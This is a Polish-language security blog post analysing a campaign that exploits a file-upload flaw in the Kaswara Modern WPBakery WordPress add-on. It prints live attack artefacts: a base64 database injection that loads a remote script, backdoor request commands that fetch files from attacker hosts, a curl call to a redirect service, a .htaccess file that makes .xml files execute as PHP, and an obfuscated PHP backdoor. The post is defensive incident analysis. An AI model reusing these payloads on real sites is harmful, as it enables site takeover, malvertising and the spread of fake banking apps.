Podatna na ataki wtyczka Kaswara Modern WPBakery Page Builder jest wykorzystywana na wolności

20 kwietnia 2021 r. nasi przyjaciele z WPScan zgłosili poważną lukę w dodatkach Kaswara Modern VC, znanych również jako dodatki Kaswara Modern WPBakery Page Builder. Nie jest już dostępny w Codecanyon/Envato, co oznacza, że ​​jeśli masz to uruchomione, musisz wybrać alternatywę.

Ta luka umożliwia nieuwierzytelnionym użytkownikom przesyłanie dowolnych plików do katalogu ikon wtyczki (./wp-content/uploads/kaswara/icons). To pierwszy wskaźnik kompromisu (IOC), który nasi przyjaciele z WPScan podzielili się z nami w swoim raporcie.

Możliwość przesyłania dowolnych plików na stronę internetową daje złemu graczowi pełną kontrolę nad stroną, co utrudnia określenie ostatecznego ładunku tej infekcji; w ten sposób pokażemy ci wszystko, co do tej pory znaleźliśmy (trochę poniosło nas badanie, więc możesz przejść do sekcji MKOl, jeśli nie chcesz czytać).

Wstrzykiwanie bazy danych, fałszywe aplikacje na Androida i inne backdoory

Podziękowania dla naszego przyjaciela Denisa Sinegubko z Sucuri za wskazanie, że w przypadku tego ataku wykorzystano następstwo wstrzyknięcia bazy danych.

Źli aktorzy zaktualizowaliby opcję „kaswara-customJS”, aby dodać dowolny złośliwy fragment kodu JavaScript. Oto jeden przykład, który znaleźliśmy:

INSERT INTO `wp_options` (`option_id`, `option_name`, `option_value`, `autoload`) VALUES (1856,'kaswara-customJS',
'dmFyIHNjcmlwdCA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoXCdzY3JpcHRcJyk7CnNjcmlwdC5vbmxvYWQgPSBm
dW5jdGlvbigpIHsKfTsKc2NyaXB0LnNyYyA9IFwiaHR0cHM6Ly9ldmFkYXYubGluay9zY3JpcHQuanNcIjsKZG9jdW1lbnQu
Z2V0RWxlbWVudHNCeVRhZ05hbWUoXCdoZWFkXCcpWzBdLmFwcGVuZENoaWxkKHNjcmlwdCk7','yes');

Ten ciąg zakodowany w base64 przekłada się na:

var script = document.createElement(\'script\');
script.onload = function() {
};
script.src = \"hxxps://evadav[.]link/script.js\";
document.getElementsByTagName(\'head\')[0].appendChild(script);

I jak to zwykle bywa w przypadku tego typu skryptu, będzie on ładował szereg innych fragmentów kodu JavaScript, a ostatecznym ładunkiem będzie albo złośliwa reklama, albo zestaw exploitów. Jest to bardzo podobne do tego, co opisał tutaj Wordfence.

W tym przypadku skrypt umiera na hxxp://double-clickd[.]com/ i nie ładuje żadnej złej zawartości. Znalazłem podejrzany Javascript dzwoniący do tej strony od początku 2020 roku, a ludzie blokują ją już od 2018 roku.

Fałszywe aplikacje przesłane na stronę

40 aplikacji na Androida znalezionych na zbadanych przez nas witrynach internetowych to fałszywe wersje różnych aplikacji, takich jak AliPay, PayPal, Correos, DHL i wiele innych, które na szczęście zostały wykryte przez najpopularniejszych producentów antywirusów zgodnie z analizą VirusTotal.

Nie sprawdziłem intencji aplikacji, ale szybki przegląd uprawnień, o które prosi, może dać nam wgląd w to, co może zrobić:

• android.permission.WRITE_SMS
• android.permission.RECEIVE_SMS
• android.permission.FOREGROUND_SERVICE
• android.permission.KILL_BACKGROUND_PROCESSES
• android.permission.READ_CONTACTS
• android.permission.READ_PHONE_STATE
• android.permission.READ_SMS
• android.permission.ACCESS_NETWORK_STATE
• android.permission.QUERY_ALL_PACKAGES
• android.permission.REQUEST_IGNORE_BATTERY_OPTIMIZATIONS
• android.permission.INTERNET
• android.permission.SEND_SMS
• android.permission.CALL_PHONE
• android.permission.WAKE_LOCK
• android.permission.REQUEST_DELETE_PACKAGES

Pliki te nie są jednak od razu przesyłane przy użyciu exploita Kaswara. Po zhakowaniu witryny atakujący najpierw prześlą inne narzędzia, aby w pełni kontrolować witrynę.

Przesłane pliki

Niektóre backdoory i inne złośliwe oprogramowanie zostały również znalezione na stronach internetowych zaatakowanych przez tę lukę. W tym poście podzielę się szybką analizą tych najpopularniejszych i najciekawszych. Najpierw jednak skupię się na tym najbardziej złożonym.

Aplikacje przekierowujące i fałszywe

Fałszywe aplikacje, które znalazłem na kilku zhakowanych witrynach, nie zostały przesłane przez wykorzystanie luki Kaswara. Są one przesyłane do witryny za pomocą wielofunkcyjnego narzędzia hakerskiego, które umożliwia atakującemu przesłanie zdalnego kodu (poprzez podanie adresu URL lub ciągu) i przekierowanie użytkownika do złośliwej witryny.

Plik można łatwo zidentyfikować po obecności następującego ciągu: base64_decode('MTIz');error_reporting(0); funkcjonować

Co ciekawe, losuje wszystko poza tym.

Złośliwe oprogramowanie znajduje się w jednej linii, co jest również interesującym IOC, jeśli szukasz tego typu anomalii kodu.

Aby ułatwić zrozumienie, rozszyfrowałem większość kodu, zmieniłem nazwy interesujących funkcji i upiększyłem kod. Szkodnik zawiera 6 różnych funkcji, a 5 z nich bazuje na wartościach przekazanych w zmiennej $_GET['ts'] . W przypadku tego dokumentu rozważmy jedną z wielu instancji, które znalazłem: c.php .

/c.php?ts=kt

To nic nie robi i zmusi witrynę do zwrócenia błędu 500 (później w kodzie).

/c.php?ts=1

Zmienia wartość flagi $q1a na true w celu sprawdzenia poprawności kodu i wysłania do atakującego komunikatu OK.

W tym przypadku witryna zdalna odpowiada: {"body":"","headers":["Location: http:\/\/good-valid-1"],"status":302,"contentType":""}

/c.php?ts=sv&v=”Kod”&p=40bd001563085fc35165329ea1ff5c5ecbdbbeef

Zapisuje plik na serwerze z kodem dostarczonym przez zawartość $_GET["v"] tak długo, jak $_GET["p"] jest sumą kontrolną SHA1 równą 123 (pamiętasz ten pierwszy IOC base64_decode('MTIz') ? jest ta suma kontrolna).

/c.php?ts=tt

Zapisuje 5 MB „-” na serwerze, prawdopodobnie używany do testowania, czy funkcja przesyłania będzie działać na serwerze.

/c.php?ts=dwm&h=HASH1,HASH2

Gdy złośliwe oprogramowanie otrzyma to żądanie, wykonuje test, aby sprawdzić, czy przesłane pliki zostały pomyślnie zapisane na serwerze. Ich skróty MD5 muszą być znane i wysyłane do zmiennej $_GET['h'] jako wartości oddzielone przecinkami.

/c.php?ts=dw&h=hash&l=URLs_as_CSV

Pobiera plik z szeregu witryn internetowych innych firm i zapisuje go na serwerze, nadając mu nazwę po ostatnich 12 znakach md5 pobranego pliku.

Jest to funkcja używana do przesyłania fałszywych aplikacji na serwer.

Oto przykład żądania pobrania złośliwych plików /c.php?ts=dw&h=7e7bcc10406f3787b0a08d4199e6a697&l=http%3A%2F%2Fsmurfetta.ru%2Fhash-de%2F%3Fh%3D7e7bcc10406f3787b0a08d4199e6a697

Przekierowywanie dostępu

Jeśli wybrano opcję kt lub nie wybrano żadnej opcji, kod przechodzi do przekierowania, które uzyskuje się poprzez żądanie obiektu blob JSON z potrzebnymi danymi. Następnie przechodzi do przekierowania odwiedzającego za pomocą funkcji nagłówka.

Odpowiedź jest taka: {"body":"","headers":["Location: https:\/\/stunningawards.life\/?u=yuek60p&o=2k5p1e0&m=1"],"status":302,"contentType":""}

Funkcja do wykonania żądania cURL z wymaganymi parametrami jest następująca: Nic nadzwyczajnego…

I można to przetłumaczyć na to żądanie cURL:

curl -X POST hxxp://papass[.]ru/click_api/v3 \
    -H 'X-Forwarded-For: 200.171.221.1' \
    -H 'Accept-Language: *' \
    -H 'User-Agent: Mozilla/5.0 (Linux; Android 11; SAMSUNG SM-G975F) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/14.0 Chrome/87.0.4280.141 Mobile Safari/537.36' \
    -d 'token=hmfovdqs9vfxp8s4rwqzxbfz6c43bwgb&force_redirect_offer=1&sub_id_1=dbhomeworkout.com&sub_id_2=dbhomeworkout.com&sub_id_3=dbhomeworkout.com&sub_id_4'

O ile mogłem przetestować, końcowy adres URL jest losowy, ale ma tę samą cechę, co fałszywa strona popularnej usługi lub aplikacji.

wp-content/uploads/kaswara/icons/16/javas.xml i wp-content/uploads/kaswara/icons/16/.htaccess

Plik XML zwykle nie jest oznaczany jako potencjalne zagrożenie, ale w tym przypadku mamy specjalnie spreparowany plik .htaccess, który zmienia sposób, w jaki widzi go serwer WWW:

Order Deny,Allow
Allow from all

<FilesMatch "_?(javas|homes|menus)\.(php|xml|pdf)\d*$">
    AddHandler application/x-httpd-php .xml .pdf
    AddType application/x-httpd-php .xml .pdf
    # ---
    SetHandler application/x-httpd-php
    ForceType application/x-httpd-php
    # ---
    php_value engine 1
    # ---
    Order Deny,Allow
    Allow from all
</FilesMatch>

W rzeczywistości mówi Apache, aby zrozumiał wszelkie pliki java, homes lub menu z xml, php lub pdf jako plik PHP, który należy odpowiednio przetworzyć i wykonać. Tak więc każdy z tych plików znajdujących się w tej samej strukturze katalogów co ten .htaccess będzie podejrzany.

Plik javas.xml jest taki sam, jak niektóre inne złośliwe pliki przesłane do witryny. Zauważyłem, że różnica polega na tym, że niektóre mają jedną lub dwie puste linie na końcu pliku, co sprawia, że ​​tradycyjne mieszanie jest nieco trudniejsze.

<?php
$LnWYZK 	  	="\163"."\164" 	 ."\162\137\162\157"	 	.	 	"\164"	. 		  (		 279	 	-  			266)	 	  ; 	 	 if( !empty		 	 (	$ { 	 $LnWYZK	   	
("\137"	.	"\103\102\106" 		 	.		 "\107")}	) 	 		)  			{  	 			 $nNZph 	 =$LnWYZK		 (	 		 "\172". 		"\161". 	(4334	 	
-4329	)		   	 	)			  ; $ouQLkV  	 	= $LnWYZK		 (	 	 	"\157\156"  	.  	"\146" .		 "\162"	.		  	 (	  9680	 	-	  9616)  	 . "\137" 		
. 		"\161"   		.   		"\162\160\142\161\162" 	 ) 		  ; 			  $VNfzSD  	 	=$LnWYZK("\160\145\162"."\156\147\162\137\163\150\141\160"	
. "\147\166\142\141" 			 ); 	  	foreach	($			  { 	 	 $LnWYZK(			  "\137".	 	"\103"  	.	  		"\102" . 			 "\106"	 	. 		"\107" 	 		
)  			}	  as	$IKRDzf   		=>	$NIvHUr	  )( 	  	$nNZph  			(	   	$IKRDzf  	)  	===	 	  		 "c"	  .  (2668 - 	  	2626	 		 )   			.   		
"\145\141"   		."\71"		   .  			"\67"	."\71\145\144"	 	.	  "\71\70\62"	.  	"\143\60" 	 . 	 	 	(314406	  -51163		 )	 	 	. "\60" 			 
.	"\145" 	 . 			 "\71" 	 .		   "\145" . "\71"	  		.	"\70"	  	 .			  "\141"	  		.	 	"\66" . 		"\66"	.	"\144"		  	.    		( 	  	9786	-		 	 
9780 		) 		  		 	&&  	$QZCMY	 		 =	 	  $VNfzSD( ""  			, 	 $ouQLkV (  	$NIvHUr)   		)  	) 		 		 	 	?$QZCMY 	 () : " 		"		  	
;  	}

Złośliwy kod jest maskowany za pomocą ciągów znaków zakodowanych w str_rot13 i base64. Używa również wartości szesnastkowych i operacji matematycznych, aby nieco bardziej ukryć ciągi. Ostateczny ładunek jest nieznany, ponieważ utworzy funkcję opartą na wartościach żądania POST. Jednak ładunek wydaje się być taki sam za każdym razem, ponieważ opiera się na sprawdzeniu md5 przed jego utworzeniem (c42ea979ed982c02632430e9e98a66d6 to skrót md5).

Wniosek

Ponieważ jest to aktywna kampania, w momencie pisania tego posta znajdujemy coraz więcej różnych przykładów złośliwego oprogramowania umieszczanych na zaatakowanych stronach. Niektóre są tylko odmianami tego, co tutaj mamy, podczas gdy inne są wystarczająco interesujące, aby przeprowadzić głębszą analizę. Poszukaj kilku mniejszych postów, które pojawią się wkrótce, aby poznać niektóre z tych innych przykładów.

To ilustruje znaczenie aktualizacji rozszerzeń najnowszymi poprawkami bezpieczeństwa; jeśli programiści nie publikują poprawek na czas lub zostaną usunięte z repozytorium WordPress.org (lub innych rynków), zdecydowanie zalecamy znalezienie bezpieczniejszej alternatywy.

Jeśli obawiasz się złośliwego oprogramowania i luk w zabezpieczeniach swojej witryny, sprawdź funkcje bezpieczeństwa Jetpack. Jetpack Security zapewnia łatwe w użyciu, kompleksowe zabezpieczenia witryny WordPress, w tym tworzenie kopii zapasowych, skanowanie złośliwego oprogramowania i ochronę przed spamem.

Wskaźniki kompromisu

Tutaj znajdziesz pełną listę wszystkich IOC, które zidentyfikowaliśmy: